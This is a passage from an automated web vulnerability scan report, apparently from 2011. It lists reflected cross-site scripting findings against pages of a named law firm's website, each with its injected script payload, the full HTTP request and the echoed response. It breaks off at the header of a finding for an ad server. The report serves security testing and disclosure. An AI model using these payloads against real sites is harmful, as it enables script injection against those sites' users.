<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CIT
...[SNIP]...
<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
Invalid data 64bbde0<img src=a onerror=alert(1)>1ea5943f0a8 for CFSQLTYPE CF_SQL_INTEGER.
</h1>
...[SNIP]...

4.170. http://www.wolfgreenfield.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb09b"><script>alert(1)</script>c37b8140c4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icocb09b"><script>alert(1)</script>c37b8140c4a HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:12 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10952

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/favicon.icocb09b"><script>alert(1)</script>c37b8140c4a');" title="Email Page">
...[SNIP]...

4.171. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/index

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e53a"><script>alert(1)</script>4a16753e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies3e53a"><script>alert(1)</script>4a16753e0/index HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:17 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10984

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies3e53a"><script>alert(1)</script>4a16753e0/index');" title="Email Page">
...[SNIP]...

4.172. http://www.wolfgreenfield.com/industries_technologies/index [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/index

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 863d1"><script>alert(1)</script>8dd4b629ffa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/index863d1"><script>alert(1)</script>8dd4b629ffa HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:18 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10988

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/index863d1"><script>alert(1)</script>8dd4b629ffa');" title="Email Page">
...[SNIP]...

4.173. http://www.wolfgreenfield.com/industries_technologies/index [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/index

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b9f3"><script>alert(1)</script>13f530a4eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/index?8b9f3"><script>alert(1)</script>13f530a4eb=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://wolfgreenfield.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:13 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 42976

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/index?8b9f3"><script>alert(1)</script>13f530a4eb=1');" title="Email Page">
...[SNIP]...

4.174. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a405c"><script>alert(1)</script>04df5b956ee was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologiesa405c"><script>alert(1)</script>04df5b956ee/v_arrow.gif HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:09 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologiesa405c"><script>alert(1)</script>04df5b956ee/v_arrow.gif');" title="Email Page">
...[SNIP]...

4.175. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/v_arrow.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e36e6"><script>alert(1)</script>50931122149 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/v_arrow.gife36e6"><script>alert(1)</script>50931122149 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:10 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/v_arrow.gife36e6"><script>alert(1)</script>50931122149');" title="Email Page">
...[SNIP]...

4.176. http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /industries_technologies/v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2cd6"><script>alert(1)</script>c085222620d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /industries_technologies/v_arrow.gif?b2cd6"><script>alert(1)</script>c085222620d=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:08 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11018

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/industries_technologies/v_arrow.gif?b2cd6"><script>alert(1)</script>c085222620d=1');" title="Email Page">
...[SNIP]...

4.177. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac1d"><script>alert(1)</script>e29a99f7d9e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascriptcac1d"><script>alert(1)</script>e29a99f7d9e/c_smartmenus.js HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:06 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/javascriptcac1d"><script>alert(1)</script>e29a99f7d9e/c_smartmenus.js');" title="Email Page">
...[SNIP]...

4.178. http://www.wolfgreenfield.com/javascript/c_smartmenus.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /javascript/c_smartmenus.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3041"><script>alert(1)</script>5a79aaed420 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /javascript/c_smartmenus.jsc3041"><script>alert(1)</script>5a79aaed420 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.1.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:07 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/javascript/c_smartmenus.jsc3041"><script>alert(1)</script>5a79aaed420');" title="Email Page">
...[SNIP]...

4.179. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/internet-domain-names

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9fda"><script>alert(1)</script>b70efdb17f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_servicese9fda"><script>alert(1)</script>b70efdb17f9/internet-domain-names HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:35 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11010

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_servicese9fda"><script>alert(1)</script>b70efdb17f9/internet-domain-names');" title="Email Page">
...[SNIP]...

4.180. http://www.wolfgreenfield.com/practices_services/internet-domain-names [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/internet-domain-names

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75a92"><script>alert(1)</script>9aa36121da was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/internet-domain-names75a92"><script>alert(1)</script>9aa36121da HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:35 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/internet-domain-names75a92"><script>alert(1)</script>9aa36121da');" title="Email Page">
...[SNIP]...

4.181. http://www.wolfgreenfield.com/practices_services/internet-domain-names [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/internet-domain-names

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1054a"><script>alert(1)</script>764b2703e6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/internet-domain-names?1054a"><script>alert(1)</script>764b2703e6d=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/industries_technologies/index
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 22451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/internet-domain-names?1054a"><script>alert(1)</script>764b2703e6d=1');" title="Email Page">
...[SNIP]...

4.182. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/v_arrow.gif

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 112f8"><script>alert(1)</script>30080c8fca4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services112f8"><script>alert(1)</script>30080c8fca4/v_arrow.gif HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services112f8"><script>alert(1)</script>30080c8fca4/v_arrow.gif');" title="Email Page">
...[SNIP]...

4.183. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/v_arrow.gif

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 653a6"><script>alert(1)</script>2fcbffe32e0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/v_arrow.gif653a6"><script>alert(1)</script>2fcbffe32e0 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:33 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 10990

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/v_arrow.gif653a6"><script>alert(1)</script>2fcbffe32e0');" title="Email Page">
...[SNIP]...

4.184. http://www.wolfgreenfield.com/practices_services/v_arrow.gif [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wolfgreenfield.com
Path:   /practices_services/v_arrow.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ec0c"><script>alert(1)</script>f8e70455e0b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /practices_services/v_arrow.gif?5ec0c"><script>alert(1)</script>f8e70455e0b=1 HTTP/1.1
Host: www.wolfgreenfield.com
Proxy-Connection: keep-alive
Referer: http://www.wolfgreenfield.com/practices_services/internet-domain-names
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=163387450.1305201715.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=163387450.397051366.1305201715.1305201715.1305201715.1; __utmc=163387450; __utmb=163387450.2.10.1305201715

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 12:02:32 GMT
Server: Apache/2.0.64 (Red Hat)
X-Powered-By: PHP/5.2.6
Connection: close
Content-Type: text/html
Content-Length: 11008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
<meta http-equiv
...[SNIP]...
<a href="javascript:email_window('http://www.wolfgreenfield.com/practices_services/v_arrow.gif?5ec0c"><script>alert(1)</script>f8e70455e0b=1');" title="Email Page">
...[SNIP]...

4.185. http://adserving.cpxinteractive.com/st [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving.cpxinteractive.com
